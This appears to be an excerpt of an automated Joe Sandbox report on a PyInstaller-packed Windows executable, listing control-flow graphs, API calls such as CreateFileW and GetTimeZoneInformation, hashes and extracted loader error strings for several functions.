                                                                                        control_flow_graph 245 7ff7ca7b4f10-7ff7ca7b4f4b call 7ff7ca7b4898 call 7ff7ca7b48a0 call 7ff7ca7b4908 252 7ff7ca7b4f51-7ff7ca7b4f5c call 7ff7ca7b48a8 245->252 253 7ff7ca7b5175-7ff7ca7b51c1 call 7ff7ca7a9c10 call 7ff7ca7b4898 call 7ff7ca7b48a0 call 7ff7ca7b4908 245->253 252->253 258 7ff7ca7b4f62-7ff7ca7b4f6c 252->258 278 7ff7ca7b52ff-7ff7ca7b536d call 7ff7ca7a9c10 call 7ff7ca7b0888 253->278 279 7ff7ca7b51c7-7ff7ca7b51d2 call 7ff7ca7b48a8 253->279 260 7ff7ca7b4f8e-7ff7ca7b4f92 258->260 261 7ff7ca7b4f6e-7ff7ca7b4f71 258->261 264 7ff7ca7b4f95-7ff7ca7b4f9d 260->264 263 7ff7ca7b4f74-7ff7ca7b4f7f 261->263 266 7ff7ca7b4f81-7ff7ca7b4f88 263->266 267 7ff7ca7b4f8a-7ff7ca7b4f8c 263->267 264->264 268 7ff7ca7b4f9f-7ff7ca7b4fb2 call 7ff7ca7ac90c 264->268 266->263 266->267 267->260 270 7ff7ca7b4fbb-7ff7ca7b4fc9 267->270 275 7ff7ca7b4fb4-7ff7ca7b4fb6 call 7ff7ca7a9c58 268->275 276 7ff7ca7b4fca-7ff7ca7b4fd6 call 7ff7ca7a9c58 268->276 275->270 286 7ff7ca7b4fdd-7ff7ca7b4fe5 276->286 299 7ff7ca7b536f-7ff7ca7b5376 278->299 300 7ff7ca7b537b-7ff7ca7b537e 278->300 279->278 288 7ff7ca7b51d8-7ff7ca7b51e3 call 7ff7ca7b48d8 279->288 286->286 289 7ff7ca7b4fe7-7ff7ca7b4ff8 call 7ff7ca7af784 286->289 288->278 297 7ff7ca7b51e9-7ff7ca7b520c call 7ff7ca7a9c58 GetTimeZoneInformation 288->297 289->253 298 7ff7ca7b4ffe-7ff7ca7b5054 call 7ff7ca7b97e0 * 4 call 7ff7ca7b4e2c 289->298 314 7ff7ca7b5212-7ff7ca7b5233 297->314 315 7ff7ca7b52d4-7ff7ca7b52fe call 7ff7ca7b4890 call 7ff7ca7b4880 call 7ff7ca7b4888 297->315 357 7ff7ca7b5056-7ff7ca7b505a 298->357 305 7ff7ca7b540b-7ff7ca7b540e 299->305 301 7ff7ca7b5380 300->301 302 7ff7ca7b53b5-7ff7ca7b53c8 call 7ff7ca7ac90c 300->302 306 7ff7ca7b5383 301->306 324 7ff7ca7b53d3-7ff7ca7b53ee call 7ff7ca7b0888 302->324 325 7ff7ca7b53ca 302->325 305->306 307 7ff7ca7b5414-7ff7ca7b541c call 7ff7ca7b4f10 305->307 312 7ff7ca7b5388-7ff7ca7b53b4 call 7ff7ca7a9c58 call 7ff7ca79b870 306->312 313 7ff7ca7b5383 call 7ff7ca7b518c 306->313 307->312 313->312 319 7ff7ca7b5235-7ff7ca7b523b 314->319 320 7ff7ca7b523e-7ff7ca7b5245 314->320 319->320 327 7ff7ca7b5259 320->327 328 7ff7ca7b5247-7ff7ca7b524f 320->328 343 7ff7ca7b53f0-7ff7ca7b53f3 324->343 344 7ff7ca7b53f5-7ff7ca7b5407 call 7ff7ca7a9c58 324->344 332 7ff7ca7b53cc-7ff7ca7b53d1 call 7ff7ca7a9c58 325->332 339 7ff7ca7b525b-7ff7ca7b52cf call 7ff7ca7b97e0 * 4 call 7ff7ca7b1e6c call 7ff7ca7b5424 * 2 327->339 328->327 336 7ff7ca7b5251-7ff7ca7b5257 328->336 332->301 336->339 339->315 343->332 344->305 359 7ff7ca7b5060-7ff7ca7b5064 357->359 360 7ff7ca7b505c 357->360 359->357 362 7ff7ca7b5066-7ff7ca7b508b call 7ff7ca7a5e68 359->362 360->359 368 7ff7ca7b508e-7ff7ca7b5092 362->368 370 7ff7ca7b50a1-7ff7ca7b50a5 368->370 371 7ff7ca7b5094-7ff7ca7b509f 368->371 370->368 371->370 373 7ff7ca7b50a7-7ff7ca7b50ab 371->373 376 7ff7ca7b50ad-7ff7ca7b50d5 call 7ff7ca7a5e68 373->376 377 7ff7ca7b512c-7ff7ca7b5130 373->377 384 7ff7ca7b50f3-7ff7ca7b50f7 376->384 385 7ff7ca7b50d7 376->385 378 7ff7ca7b5132-7ff7ca7b5134 377->378 379 7ff7ca7b5137-7ff7ca7b5144 377->379 378->379 381 7ff7ca7b515f-7ff7ca7b516e call 7ff7ca7b4890 call 7ff7ca7b4880 379->381 382 7ff7ca7b5146-7ff7ca7b515c call 7ff7ca7b4e2c 379->382 381->253 382->381 384->377 390 7ff7ca7b50f9-7ff7ca7b5117 call 7ff7ca7a5e68 384->390 388 7ff7ca7b50da-7ff7ca7b50e1 385->388 388->384 392 7ff7ca7b50e3-7ff7ca7b50f1 388->392 397 7ff7ca7b5123-7ff7ca7b512a 390->397 392->384 392->388 397->377 398 7ff7ca7b5119-7ff7ca7b511d 397->398 398->377 399 7ff7ca7b511f 398->399 399->397
                                                                                        APIs
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B4F55
                                                                                          • Part of subcall function 00007FF7CA7B48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7B48BC
                                                                                          • Part of subcall function 00007FF7CA7A9C58: HeapFree.KERNEL32(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C6E
                                                                                          • Part of subcall function 00007FF7CA7A9C58: GetLastError.KERNEL32(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C78
                                                                                          • Part of subcall function 00007FF7CA7A9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7CA7A9BEF,?,?,?,?,?,00007FF7CA7A9ADA), ref: 00007FF7CA7A9C19
                                                                                          • Part of subcall function 00007FF7CA7A9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7CA7A9BEF,?,?,?,?,?,00007FF7CA7A9ADA), ref: 00007FF7CA7A9C3E
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B4F44
                                                                                          • Part of subcall function 00007FF7CA7B4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7B491C
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51BA
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51CB
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51DC
                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CA7B541C), ref: 00007FF7CA7B5203
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                        • API String ID: 4070488512-239921721
                                                                                        • Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                        • Instruction ID: 475dcff8af34952df7fbc75609c0b8e964b7cda9e0bb69a7eacc0b0c14469098
                                                                                        • Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                        • Instruction Fuzzy Hash: EFD19FA6E0874286F720BF27B8601B9A3A1FB687A6FC44175DE0E47695DF3CE451C360
                                                                                        Function 00007FF7CA7B5C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 514 7ff7ca7b5c74-7ff7ca7b5ce7 call 7ff7ca7b59a8 517 7ff7ca7b5d01-7ff7ca7b5d0b call 7ff7ca7a7830 514->517 518 7ff7ca7b5ce9-7ff7ca7b5cf2 call 7ff7ca7a43d4 514->518 523 7ff7ca7b5d26-7ff7ca7b5d8f CreateFileW 517->523 524 7ff7ca7b5d0d-7ff7ca7b5d24 call 7ff7ca7a43d4 call 7ff7ca7a43f4 517->524 525 7ff7ca7b5cf5-7ff7ca7b5cfc call 7ff7ca7a43f4 518->525 527 7ff7ca7b5d91-7ff7ca7b5d97 523->527 528 7ff7ca7b5e0c-7ff7ca7b5e17 GetFileType 523->528 524->525 536 7ff7ca7b6042-7ff7ca7b6062 525->536 534 7ff7ca7b5dd9-7ff7ca7b5e07 GetLastError call 7ff7ca7a4368 527->534 535 7ff7ca7b5d99-7ff7ca7b5d9d 527->535 531 7ff7ca7b5e19-7ff7ca7b5e54 GetLastError call 7ff7ca7a4368 CloseHandle 528->531 532 7ff7ca7b5e6a-7ff7ca7b5e71 528->532 531->525 548 7ff7ca7b5e5a-7ff7ca7b5e65 call 7ff7ca7a43f4 531->548 539 7ff7ca7b5e73-7ff7ca7b5e77 532->539 540 7ff7ca7b5e79-7ff7ca7b5e7c 532->540 534->525 535->534 541 7ff7ca7b5d9f-7ff7ca7b5dd7 CreateFileW 535->541 545 7ff7ca7b5e82-7ff7ca7b5ed7 call 7ff7ca7a7748 539->545 540->545 546 7ff7ca7b5e7e 540->546 541->528 541->534 553 7ff7ca7b5ef6-7ff7ca7b5f27 call 7ff7ca7b5728 545->553 554 7ff7ca7b5ed9-7ff7ca7b5ee5 call 7ff7ca7b5bb0 545->554 546->545 548->525 560 7ff7ca7b5f29-7ff7ca7b5f2b 553->560 561 7ff7ca7b5f2d-7ff7ca7b5f6f 553->561 554->553 559 7ff7ca7b5ee7 554->559 562 7ff7ca7b5ee9-7ff7ca7b5ef1 call 7ff7ca7a9dd0 559->562 560->562 563 7ff7ca7b5f91-7ff7ca7b5f9c 561->563 564 7ff7ca7b5f71-7ff7ca7b5f75 561->564 562->536 567 7ff7ca7b5fa2-7ff7ca7b5fa6 563->567 568 7ff7ca7b6040 563->568 564->563 566 7ff7ca7b5f77-7ff7ca7b5f8c 564->566 566->563 567->568 570 7ff7ca7b5fac-7ff7ca7b5ff1 CloseHandle CreateFileW 567->570 568->536 571 7ff7ca7b6026-7ff7ca7b603b 570->571 572 7ff7ca7b5ff3-7ff7ca7b6021 GetLastError call 7ff7ca7a4368 call 7ff7ca7a7970 570->572 571->568 572->571
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                        • String ID:
                                                                                        • API String ID: 1617910340-0
                                                                                        • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                        • Instruction ID: 6798bf5561f63eb413830064ae0e49be6dbe10bc9b9e35f1db636e762b79dfd0
                                                                                        • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                        • Instruction Fuzzy Hash: FDC1E172B28B4185FB10DF6AE0A06AC7761FB98BA9F801265DE1E5B394CF38D451C310
                                                                                        Function 00007FF7CA7B518C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 845 7ff7ca7b518c-7ff7ca7b51c1 call 7ff7ca7b4898 call 7ff7ca7b48a0 call 7ff7ca7b4908 852 7ff7ca7b52ff-7ff7ca7b536d call 7ff7ca7a9c10 call 7ff7ca7b0888 845->852 853 7ff7ca7b51c7-7ff7ca7b51d2 call 7ff7ca7b48a8 845->853 865 7ff7ca7b536f-7ff7ca7b5376 852->865 866 7ff7ca7b537b-7ff7ca7b537e 852->866 853->852 858 7ff7ca7b51d8-7ff7ca7b51e3 call 7ff7ca7b48d8 853->858 858->852 864 7ff7ca7b51e9-7ff7ca7b520c call 7ff7ca7a9c58 GetTimeZoneInformation 858->864 878 7ff7ca7b5212-7ff7ca7b5233 864->878 879 7ff7ca7b52d4-7ff7ca7b52fe call 7ff7ca7b4890 call 7ff7ca7b4880 call 7ff7ca7b4888 864->879 870 7ff7ca7b540b-7ff7ca7b540e 865->870 867 7ff7ca7b5380 866->867 868 7ff7ca7b53b5-7ff7ca7b53c8 call 7ff7ca7ac90c 866->868 871 7ff7ca7b5383 867->871 886 7ff7ca7b53d3-7ff7ca7b53ee call 7ff7ca7b0888 868->886 887 7ff7ca7b53ca 868->887 870->871 872 7ff7ca7b5414-7ff7ca7b541c call 7ff7ca7b4f10 870->872 876 7ff7ca7b5388-7ff7ca7b53b4 call 7ff7ca7a9c58 call 7ff7ca79b870 871->876 877 7ff7ca7b5383 call 7ff7ca7b518c 871->877 872->876 877->876 882 7ff7ca7b5235-7ff7ca7b523b 878->882 883 7ff7ca7b523e-7ff7ca7b5245 878->883 882->883 889 7ff7ca7b5259 883->889 890 7ff7ca7b5247-7ff7ca7b524f 883->890 903 7ff7ca7b53f0-7ff7ca7b53f3 886->903 904 7ff7ca7b53f5-7ff7ca7b5407 call 7ff7ca7a9c58 886->904 893 7ff7ca7b53cc-7ff7ca7b53d1 call 7ff7ca7a9c58 887->893 899 7ff7ca7b525b-7ff7ca7b52cf call 7ff7ca7b97e0 * 4 call 7ff7ca7b1e6c call 7ff7ca7b5424 * 2 889->899 890->889 897 7ff7ca7b5251-7ff7ca7b5257 890->897 893->867 897->899 899->879 903->893 904->870
                                                                                        APIs
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51BA
                                                                                          • Part of subcall function 00007FF7CA7B4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7B491C
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51CB
                                                                                          • Part of subcall function 00007FF7CA7B48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7B48BC
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51DC
                                                                                          • Part of subcall function 00007FF7CA7B48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7B48EC
                                                                                          • Part of subcall function 00007FF7CA7A9C58: HeapFree.KERNEL32(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C6E
                                                                                          • Part of subcall function 00007FF7CA7A9C58: GetLastError.KERNEL32(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C78
                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CA7B541C), ref: 00007FF7CA7B5203
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                        • API String ID: 3458911817-239921721
                                                                                        • Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                        • Instruction ID: 63bd7a8fefcc0e4afcc44a7586fe947c1790870a0260412d6fd5c52c00f07757
                                                                                        • Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                        • Instruction Fuzzy Hash: 04517BB2A1874286F720FF23F8A15A9A760FB5C7A6F844175EE0D43696DF3CE4408760
                                                                                        Function 00007FF7CA7985A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                        • Instruction ID: 7809cd8405d3a0183a2d09d59aa69b0bff6986bdcfae487c5cd2646ec74e0990
                                                                                        • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                        • Instruction Fuzzy Hash: 5FF0C822A1874586F7609F71B4A8B66B360FB88739F84033AD97D066D4CF3CD0588B00
                                                                                        Function 00007FF7CA7918F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 179 7ff7ca7918f0-7ff7ca79192b call 7ff7ca793f70 182 7ff7ca791bc1-7ff7ca791be5 call 7ff7ca79b870 179->182 183 7ff7ca791931-7ff7ca791971 call 7ff7ca7976a0 179->183 188 7ff7ca791977-7ff7ca791987 call 7ff7ca79f9f4 183->188 189 7ff7ca791bae-7ff7ca791bb1 call 7ff7ca79f36c 183->189 194 7ff7ca7919a1-7ff7ca7919bd call 7ff7ca79f6bc 188->194 195 7ff7ca791989-7ff7ca79199c call 7ff7ca792760 188->195 192 7ff7ca791bb6-7ff7ca791bbe 189->192 192->182 200 7ff7ca7919bf-7ff7ca7919d2 call 7ff7ca792760 194->200 201 7ff7ca7919d7-7ff7ca7919ec call 7ff7ca7a4154 194->201 195->189 200->189 206 7ff7ca791a06-7ff7ca791a87 call 7ff7ca791bf0 * 2 call 7ff7ca79f9f4 201->206 207 7ff7ca7919ee-7ff7ca791a01 call 7ff7ca792760 201->207 215 7ff7ca791a8c-7ff7ca791a9f call 7ff7ca7a4170 206->215 207->189 218 7ff7ca791aa1-7ff7ca791ab4 call 7ff7ca792760 215->218 219 7ff7ca791ab9-7ff7ca791ad2 call 7ff7ca79f6bc 215->219 218->189 224 7ff7ca791ad4-7ff7ca791ae7 call 7ff7ca792760 219->224 225 7ff7ca791aec-7ff7ca791b08 call 7ff7ca79f430 219->225 224->189 230 7ff7ca791b0a-7ff7ca791b16 call 7ff7ca7925f0 225->230 231 7ff7ca791b1b-7ff7ca791b29 225->231 230->189 231->189 233 7ff7ca791b2f-7ff7ca791b3e 231->233 235 7ff7ca791b40-7ff7ca791b46 233->235 236 7ff7ca791b60-7ff7ca791b6f 235->236 237 7ff7ca791b48-7ff7ca791b55 235->237 236->236 238 7ff7ca791b71-7ff7ca791b7a 236->238 237->238 239 7ff7ca791b8f 238->239 240 7ff7ca791b7c-7ff7ca791b7f 238->240 242 7ff7ca791b91-7ff7ca791bac 239->242 240->239 241 7ff7ca791b81-7ff7ca791b84 240->241 241->239 243 7ff7ca791b86-7ff7ca791b89 241->243 242->189 242->235 243->239 244 7ff7ca791b8b-7ff7ca791b8d 243->244 244->242
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _fread_nolock$Message
                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                        • API String ID: 677216364-3497178890
                                                                                        • Opcode ID: 57b6e4ea9f39556d2677422c2246312e24261b951277e46f7f86142bb6056f80
                                                                                        • Instruction ID: 97c684da1bd20317123bda7fa7aab4def5129d99004653001d8efda2abe0edd6
                                                                                        • Opcode Fuzzy Hash: 57b6e4ea9f39556d2677422c2246312e24261b951277e46f7f86142bb6056f80
                                                                                        • Instruction Fuzzy Hash: 0671E871B0878285FB60EF36F460AB9A391FB8C7A6F804076DD8D47759EE2CE5448760
                                                                                        Function 00007FF7CA791440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                        • API String ID: 2030045667-3659356012
                                                                                        • Opcode ID: 9a0b35fad34c2c70fa4792be24f624e82cd728b0c385409cbfb914aea3d8cfbd
                                                                                        • Instruction ID: a0eb16912b932c42a1d9baf0563eb8dcd5e61943c4c21d96487518526caeb14a
                                                                                        • Opcode Fuzzy Hash: 9a0b35fad34c2c70fa4792be24f624e82cd728b0c385409cbfb914aea3d8cfbd
                                                                                        • Instruction Fuzzy Hash: C7418E61B0864281FA60BF37B4619BAE3A0FB5C7E6FD44072DE4E07A95EE3CE5418710
                                                                                        Function 00007FF7CA7911F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                        • API String ID: 2030045667-2813020118
                                                                                        • Opcode ID: 85026a7eca33eed62396a3c44ac8e2af46aea1793c30bb10ceca8764f980f820
                                                                                        • Instruction ID: b5391e1676d64e335cf7a320f6b982baa8b1e2f378caacd0a6270989fd340161
                                                                                        • Opcode Fuzzy Hash: 85026a7eca33eed62396a3c44ac8e2af46aea1793c30bb10ceca8764f980f820
                                                                                        • Instruction Fuzzy Hash: E551D262A0864281FA60BF37B460BBAA390BB897A6FC44176DD4D477D5EF3CE4118720
                                                                                        Function 00007FF7CA7AE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7CA7AE3BA,?,?,-00000018,00007FF7CA7AA063,?,?,?,00007FF7CA7A9F5A,?,?,?,00007FF7CA7A524E), ref: 00007FF7CA7AE19C
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7CA7AE3BA,?,?,-00000018,00007FF7CA7AA063,?,?,?,00007FF7CA7A9F5A,?,?,?,00007FF7CA7A524E), ref: 00007FF7CA7AE1A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeLibraryProc
                                                                                        • String ID: api-ms-$ext-ms-
